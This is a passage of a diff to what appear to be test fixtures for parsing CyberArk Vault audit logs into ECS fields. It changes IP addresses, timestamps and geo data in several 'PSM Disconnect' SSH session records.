09:48:40\",\"IsoTimestamp\":\"2021-03-11T17:48:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813781400Z", + "original": "\u003c5\u003e1 2021-03-11T17:48:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:40\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:40Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:40\",\"IsoTimestamp\":\"2021-03-11T17:48:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -468,20 +441,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -505,7 +469,7 @@ }, "@timestamp": "2021-03-11T17:55:02.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -517,15 +481,15 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:55:02Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:55:02\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:55:02Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:55:02\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:55:02Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -538,21 +502,21 @@ "psmid": "PSMServer", "session_id": "d8ff4d32-8292-11eb-b962-080027efd402", "src_host": "10.0.2.2", - "dst_host": "34.123.103.115", + "dst_host": "67.43.156.15", "session_duration": "00:00:12" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "PSM Disconnect", "timestamp": "Mar 11 09:55:02", "desc": "PSM Disconnect" @@ -564,8 +528,8 @@ "event": { "severity": 2, "duration": 12000000000, - "ingested": "2021-06-09T10:24:31.624804300Z", - "original": "\u003c5\u003e1 2021-03-11T17:55:02Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:55:02\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:55:02Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:55:02\",\"IsoTimestamp\":\"2021-03-11T17:55:02Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813790600Z", + "original": "\u003c5\u003e1 2021-03-11T17:55:02Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:55:02\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:55:02Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:55:02\",\"IsoTimestamp\":\"2021-03-11T17:55:02Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -588,20 +552,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -625,7 +580,7 @@ }, "@timestamp": "2021-03-11T17:56:42.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -637,15 +592,15 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:56:42Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:56:42\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:56:42Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:56:42\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:56:42Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -658,21 +613,21 @@ "psmid": "PSMServer", "session_id": "173dd46a-8293-11eb-afcb-080027efd402", "src_host": "10.0.2.2", - "dst_host": "34.123.103.115", + "dst_host": "67.43.156.15", "session_duration": "00:00:12" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "PSM Disconnect", "timestamp": "Mar 11 09:56:42", "desc": "PSM Disconnect" @@ -684,8 +639,8 @@ "event": { "severity": 2, "duration": 12000000000, - "ingested": "2021-06-09T10:24:31.624807Z", - "original": "\u003c5\u003e1 2021-03-11T17:56:42Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:56:42\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:56:42Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 